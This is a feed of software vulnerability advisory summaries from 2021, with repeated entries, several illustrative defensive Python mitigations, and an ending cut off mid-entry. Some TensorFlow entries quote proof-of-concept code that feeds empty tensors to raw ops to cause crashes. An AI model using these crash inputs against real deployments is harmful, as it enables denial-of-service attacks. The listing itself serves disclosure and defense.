Advisories

Jun 2021

Insertion of Sensitive Information into Log File in ansible

A flaw was found in the Ansible bitbucket_pipeline_variable module, where credentials are disclosed in the console log by default and are not protected by the no_log security feature. This flaw allows an attacker to steal Bitbucket pipeline credentials. The highest threat from this vulnerability is to confidentiality.

Insertion of Sensitive Information into Log File in ansible

A flaw was found in Ansible. Credentials, such as secrets, are disclosed in the console log by default and are not protected by the no_log feature when using the affected modules. An attacker can take advantage of this information to steal those credentials. The highest threat from this vulnerability is to data confidentiality.

Incorrect Authorization

A flaw was found in the BPMN editor. Any authenticated user from any project can see the name of Ruleflow Groups from other projects, despite the user not having access to those projects. The highest threat from this vulnerability is to confidentiality.

Improper Verification of Cryptographic Signature in aws-encryption-sdk-javascript

This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext; however, some callers may rely on the ECDSA signature for non-repudiation. Without validating the …

Improper Restriction of Communication Channel to Intended Endpoints

Singularity is an open source container platform. In versions 3.7.2 and 3.7.3, due to incorrect use of a default URL, singularity action commands (run/shell/exec) specifying a container using a library:// URI will always attempt to retrieve the container from the default remote endpoint (cloud.sylabs.io) rather than the configured remote endpoint. An attacker may be able to push a malicious container to the default remote endpoint with a URI that is …

Deserialization of Untrusted Data

Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. However, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, i.e., not following the server's instruction. This means that if a weak deserializer such as Kryo or FST is somehow in code scope (e.g. if Kryo is somehow …

Deserialization of Untrusted Data

Apache Dubbo by default supports generic calls to arbitrary methods exposed by provider interfaces. These invocations are handled by the GenericFilter which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object; where the first argument is the name of the method to invoke, the …

Code Injection

Apache Dubbo supports script routing, which enables a customer to route a request to the right server. These rules are used by customers when making a request in order to find the right endpoint. When parsing these rules, Dubbo customers use ScriptEngine and run the rule provided by the script, which by default may enable executing arbitrary code.

Authentication Bypass by Spoofing

An authentication bypass vulnerability was found in Kiali in versions before 1.31.0 when the authentication strategy OpenID is used. When RBAC is enabled, Kiali assumes that some of the token validation is handled by the underlying cluster. When OpenID implicit flow is used with RBAC turned off, this token validation doesn't occur, and this allows a malicious user to bypass the authentication.

May 2021

Argument Injection or Modification

An argument injection vulnerability in the Dragonfly gem for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
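
As an illustrative sketch, not Dragonfly's actual code: the danger with URL-derived values spliced into an ImageMagick convert invocation is that a value beginning with a dash is parsed as an option rather than a filename. One common hedge, shown below with a hypothetical reject_suspicious helper, is to refuse such values and to pass arguments as a list rather than a shell string.

import subprocess

def reject_suspicious(value: str) -> str:
    # Hypothetical guard: refuse values convert would parse as an option or file indirection.
    if value.startswith("-") or value.startswith("@"):
        raise ValueError("refusing argument that looks like a convert option: %r" % value)
    return value

def make_thumbnail(src: str, dest: str) -> None:
    # Passing a list (not a shell string) avoids shell interpolation entirely; the guard above
    # additionally blocks values that convert itself would treat as options.
    subprocess.run(
        ["convert", reject_suspicious(src), "-resize", "100x100", reject_suspicious(dest)],
        check=True,
    )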

Out-of-bounds Write

A flaw was found in the ZeroMQ server. This flaw allows a malicious client to cause a stack buffer overflow on the server by sending crafted topic subscription requests and then unsubscribing. The highest threat from this vulnerability is to confidentiality and integrity, as well as system availability.

Improper Neutralization of Special Elements used in a Command ('Command Injection') in @floffah/build

Impact: If you are using the esbuild target or command, you are at risk of code/option injection. Attackers can use the command line option to maliciously change your settings in order to damage your project. Patches: The problem has been patched in v1.0.0, as it uses a proper method to pass configs to esbuild/estrella. Workarounds: There is no workaround. You should update as soon as possible. Notes: This notice is mainly just …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …

Improper Input Validation

A flaw was found in Keycloak. A self-stored XSS attack vector, escalating to a complete account takeover, is possible because user-supplied data fields are not properly encoded and JavaScript code is used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Use of Incorrectly-Resolved Name or Reference

runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)

URL Redirection to Untrusted Site (Open Redirect)

Tenancy multi-tenant is an open source multi-domain controller for the Laravel web framework. In some situations, it is possible to have open redirects where users can be redirected from your site to any other site using a specially crafted URL. This is only the case for installations where the default Hostname Identification is used and the environment uses tenants that have force_https set to true (the default is false).

Reliance on Reverse DNS Resolution for a Security-Critical Action

In Weave Net before version 2.6.3, an attacker able to run a process as root in a container is able to respond to DNS requests from the host and thereby insert themselves as a fake service. In a cluster with an IPv4 internal network, if IPv6 is not totally disabled on the host (via ipv6.disable=1 on the kernel cmdline), it will be either unconfigured or configured on some interfaces, but …

Path Traversal

runc allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.

Path Traversal

Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …

Out-of-bounds Write

Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …

Out-of-bounds Write

Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …

Listing of upload directory contents possible

There is a security issue in prosody-filer versions < 1.0.1 that leads to unwanted directory listings of download directories. An attacker is able to list previous uploads of a certain user by shortening the URL and accessing a URL subdirectory other than /upload/ (or the corresponding user-defined root dir). Version 1.0.1 and later fix this problem and allow only direct file access if the full path is known. Directory listings …
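
A rough sketch of the fix's intent, in Python rather than prosody-filer's Go code and assuming a hypothetical UPLOAD_ROOT: only serve a request when the resolved path is a regular file strictly inside the upload root, and never fall back to a directory listing.

from pathlib import Path

UPLOAD_ROOT = Path("/var/lib/prosody-filer/upload").resolve()  # hypothetical upload root

def serve(requested: str):
    target = (UPLOAD_ROOT / requested.lstrip("/")).resolve()
    if UPLOAD_ROOT not in target.parents:
        return 403  # escaped the root (or is the root itself): refuse
    if not target.is_file():
        return 404  # directories are never listed, only known files are served
    return target.read_bytes()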

Incorrect Authorization

Istio has a remotely exploitable vulnerability where an HTTP request path with multiple slashes or escaped slash characters (%2F or %5C) could potentially bypass an Istio authorization policy when path based authorization rules are used.
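
As a conceptual sketch, not Istio's implementation or configuration: a rule written against a literal path such as /admin/secrets is bypassable if the raw request path is compared before percent-decoding and slash collapsing, so normalization has to happen before the comparison.

import posixpath
import re
from urllib.parse import unquote

DENIED_PATH = "/admin/secrets"  # example of a path-based authorization rule

def naive_denied(raw_path: str) -> bool:
    # Compares only the literal spelling of the request path.
    return raw_path == DENIED_PATH

def normalized_denied(raw_path: str) -> bool:
    path = unquote(raw_path)              # decode %2F, %5C, and friends
    path = re.sub(r"[\\/]+", "/", path)   # collapse duplicate and escaped slashes
    path = posixpath.normpath(path)       # resolve ./ and ../ segments
    return path == DENIED_PATH

for attempt in ["/admin/secrets", "//admin/secrets", "/admin%2Fsecrets", "/admin/./secrets"]:
    print(attempt, naive_denied(attempt), normalized_denied(attempt))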

Improper Privilege Management

Spring Framework WebFlux applications are vulnerable to a privilege escalation. By (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.

Exposure of Sensitive Information to an Unauthorized Actor

There is an information disclosure vulnerability in Helm from version 3.1.0 and before version 3.2.0. lookup is a Helm template function introduced in Helm v3. It is able to look up resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates. The documented behavior of helm template states that it does not …

Authentication Bypass by Capture-replay

In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], the OpenID specification says the following about the assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …
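
A minimal sketch of the uniqueness check the specification calls for, not Hydra's actual implementation: remember each assertion's jti until the token expires and reject any repeat.

import time

class JtiReplayGuard:
    """Tracks seen jti values until their expiry so a client assertion cannot be replayed."""

    def __init__(self):
        self._seen = {}  # jti -> expiry timestamp

    def check_and_store(self, jti: str, exp: float) -> None:
        now = time.time()
        # Drop entries whose tokens have expired; they can no longer be replayed anyway.
        self._seen = {k: v for k, v in self._seen.items() if v > now}
        if jti in self._seen:
            raise ValueError("client assertion jti has already been used")
        self._seen[jti] = exp

guard = JtiReplayGuard()
guard.check_and_store("token-1", time.time() + 300)      # first use: accepted
try:
    guard.check_and_store("token-1", time.time() + 300)  # replay: rejected
except ValueError as err:
    print(err)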

Authentication Bypass by Capture-replay

In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], the OpenID specification says the following about the assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …

URL Redirection to Untrusted Site ('Open Redirect')

OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if an allowlist domain was configured for …
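
A conceptual sketch, not OAuth2 Proxy's code, of the difference between a naive suffix match and a strict domain check: a plain endswith() accepts evilexample.com when the allowlist contains example.com, while requiring an exact match or a dot boundary does not.

def naive_allowed(host: str, allowed_domain: str) -> bool:
    # Accepts any host whose spelling merely ends with the allowed domain.
    return host.endswith(allowed_domain)

def strict_allowed(host: str, allowed_domain: str) -> bool:
    # Accepts the domain itself or a true subdomain (dot boundary required).
    return host == allowed_domain or host.endswith("." + allowed_domain)

for host in ["example.com", "app.example.com", "evilexample.com"]:
    print(host, naive_allowed(host, "example.com"), strict_allowed(host, "example.com"))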

URL Redirection to Untrusted Site ('Open Redirect')

OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if an allowlist domain was configured for …

Uncontrolled Resource Consumption

ws is an open source WebSocket client and server library for Node.js. Vulnerable versions of ws are subject to uncontrolled resource consumption when handling requests; the issue can be mitigated by reducing the maximum allowed length of the request headers.

Incorrect Authorization

Pion WebRTC before 3.0.15 didn't properly tear down the DTLS connection when certificate verification failed. The PeerConnectionState was set to failed, but a user could ignore that and continue to use the PeerConnection. (A WebRTC implementation shouldn't allow the user to continue if verification has failed.)

Improper Input Validation

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …
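
An illustrative sketch in Python, not Wicket's code: the safe behavior amounts to treating X-Forwarded-For as untrusted and only performing a reverse lookup when the forwarded value parses as an IP address literal.

import ipaddress
import socket

def reverse_lookup_client(xff_header: str):
    """Resolve the client only if the forwarded value is a literal IP address."""
    candidate = xff_header.split(",")[0].strip()  # first hop in the header
    try:
        ip = ipaddress.ip_address(candidate)
    except ValueError:
        return None  # not an IP literal: refuse to trigger a DNS lookup
    try:
        return socket.gethostbyaddr(str(ip))[0]
    except OSError:
        return None

print(reverse_lookup_client("203.0.113.7"))
print(reverse_lookup_client("attacker-controlled.example."))  # rejected, no lookup performed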

Improper Input Validation

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …

Cross-site Scripting in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since there is no validation of the input sent to the name parameter in the noticeWizard endpoint. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.

Cross-site Scripting in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function validateFormInput() performs improper validation checks on the input sent to the groupName and groupComment parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files, which can cause severe damage to the organization using OpenNMS.

Cross-Site Request Forgery in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF because there is no CSRF protection and no validation of an existing user name when renaming a user. As a result, the privileges of the renamed user are overwritten by those of the old user, and the old user is deleted from the user list.

Cross-Site Request Forgery in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF because there is no CSRF protection at /opennms/admin/userGroupView/users/updateUser. This flaw allows the ROLE_ADMIN security role to be assigned to a normal user. Using this flaw, an attacker can trick an admin user into assigning administrator privileges to a normal user by enticing them to visit an attacker-controlled website.

Cross-Site Request Forgery in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF because there is no CSRF protection and no validation of an existing user name when renaming a user. As a result, the privileges of the renamed user are overwritten by those of the old user, and the old user is deleted from the user list.

Arbitrary code execution due to an uncontrolled search path for the git binary

The Go language recently addressed a security issue in the way that binaries are located before being executed. Some operating systems, such as Windows, still include the current directory in the default search path and give it priority over the system-wide path. This means that a malicious user could craft, for example, a git.bat command, commit it, and push it to a repository. Later, when git-bug …
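
A hedged sketch of the defensive idea, in Python rather than git-bug's Go code: resolve the git binary through a search path that excludes the current directory and the repository, and refuse a result that lives inside the working tree. resolve_git and its checks are illustrative only.

import os
import shutil

def resolve_git(repo_dir: str) -> str:
    repo_dir = os.path.abspath(repo_dir)
    # Build a search path that never contains the repository or the current directory.
    search_path = os.pathsep.join(
        p for p in os.environ.get("PATH", "").split(os.pathsep)
        if p and os.path.abspath(p) not in (repo_dir, os.getcwd())
    )
    candidate = shutil.which("git", path=search_path)
    if candidate is None:
        raise FileNotFoundError("git not found on a trusted search path")
    candidate = os.path.abspath(candidate)
    # Refuse anything that would execute a file committed into the repository itself.
    if candidate.startswith(repo_dir + os.sep):
        raise PermissionError("refusing to run git from inside the repository")
    return candidate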

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Uncontrolled Search Path Element

cloudflared versions prior to 2020.8.1 contain a local privilege escalation vulnerability on Windows systems. When run on a Windows system, cloudflared searches for configuration files which could be abused by a malicious entity to execute commands as a privileged user. Version 2020.8.1 fixes this issue.

Signature Validation Bypass

Impact: Given a valid SAML Response, an attacker can potentially modify the document, bypassing signature validation in order to pass off the altered document as a signed one. This enables a variety of attacks, including users accessing accounts other than the one to which they authenticated in the identity provider, or full authentication bypass if an external attacker can obtain an expired, signed SAML Response. Patches: A patch is available, …

Reachable Assertion

A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed by OpenLDAP’s slapd server, to trigger an assertion failure. The highest threat from this vulnerability is to system availability.

plugin.yaml file allows for duplicate entries in helm

During a security audit of Helm's code base, Helm maintainers identified a bug in which a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git …

plugin.yaml file allows for duplicate entries in helm

During a security audit of Helm's code base, Helm maintainers identified a bug in which a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git …

NULL Pointer Dereference

In teler before version 0.0.1, if you run teler inside a Docker container and the errors.Exit function is triggered, it will cause a denial of service (SIGSEGV) because teler does not properly obtain its process ID and process group ID before attempting to kill the process. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.

NULL Pointer Dereference

In teler before version 0.0.1, if you run teler inside a Docker container and the errors.Exit function is triggered, it will cause a denial of service (SIGSEGV) because teler does not properly obtain its process ID and process group ID before attempting to kill the process. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.

Information Exposure

Keystone 5 is an open source CMS platform to build Node.js applications. This security advisory relates to a newly discovered capability in our query infrastructure to directly or indirectly expose the values of private fields, bypassing the configured access control.

Incorrect Resource Transfer Between Spheres

containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in …
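
For context, a peer-credential check of the kind described looks roughly like this Linux-only Python sketch; it is illustrative, not containerd's Go code, and the advisory's point is that checking the peer's UID alone is not enough when the abstract socket itself is reachable from a container.

import socket
import struct

def peer_is_root(conn: socket.socket) -> bool:
    # SO_PEERCRED yields the (pid, uid, gid) of the process on the other end of a Unix socket.
    creds = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("3i"))
    pid, uid, gid = struct.unpack("3i", creds)
    return uid == 0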

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within unsquashfs, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for an unprivileged (either installation or with allow setuid = no) run of Singularity when a user attempts to …
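
A conceptual sketch of the missing sanitization, in Python and independent of unsquashfs: before writing an extracted entry, resolve its destination and reject anything that escapes the extraction directory.

import os

def safe_member_path(dest_dir: str, member_name: str) -> str:
    dest_dir = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest_dir, member_name))
    if target != dest_dir and not target.startswith(dest_dir + os.sep):
        raise ValueError("archive member escapes the extraction directory: %r" % member_name)
    return target

safe_member_path("/tmp/extract", "rootfs/etc/passwd")      # stays inside, accepted
safe_member_path("/tmp/extract", "../../etc/cron.d/evil")  # escapes, raises ValueError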

Improper Handling of Exceptional Conditions

In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this to their advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0.

Improper Handling of Exceptional Conditions

In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this to their advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0.

Cross-site Scripting

A reflected cross-site scripting (XSS) vulnerability in Shopizer allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.
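
The general mitigation for this class of bug, sketched in Python rather than Shopizer's Java: HTML-encode any request parameter before reflecting it into a page.

import html

def render_ref_banner(ref_param: str) -> str:
    # Encoding <, >, & and quotes keeps the parameter from being interpreted as markup.
    return "<p>Referred by: {}</p>".format(html.escape(ref_param, quote=True))

print(render_ref_banner("<script>alert(1)</script>"))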

Command Injection

The @ronomon/opened library contains a command injection vulnerability that would allow a remote attacker to execute commands on the system if the library is used with untrusted input.

accounts: Hash account number using Salt

@alovak found that when we currently build the hash of an account number we do not "salt" it, which makes it vulnerable to a rainbow table attack. What did you expect to see? I expected a salt (some random number from configuration) to be used in hash.AccountNumber. I would generate a salt per tenant at least (maybe per organization).
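
A minimal sketch of the suggestion, in Python rather than the project's Go code: derive the digest with a per-tenant salt (here via HMAC-SHA256) so identical account numbers in different tenants hash to different values and precomputed rainbow tables stop working. The salt handling shown is purely illustrative.

import hashlib
import hmac
import os

# Illustrative only: in practice the salt would come from configuration, one per tenant.
TENANT_SALTS = {"tenant-a": os.urandom(32), "tenant-b": os.urandom(32)}

def hash_account_number(tenant: str, account_number: str) -> str:
    salt = TENANT_SALTS[tenant]
    return hmac.new(salt, account_number.encode(), hashlib.sha256).hexdigest()

# The same account number now yields different digests per tenant.
print(hash_account_number("tenant-a", "123456789"))
print(hash_account_number("tenant-b", "123456789"))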

Use After Free

A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

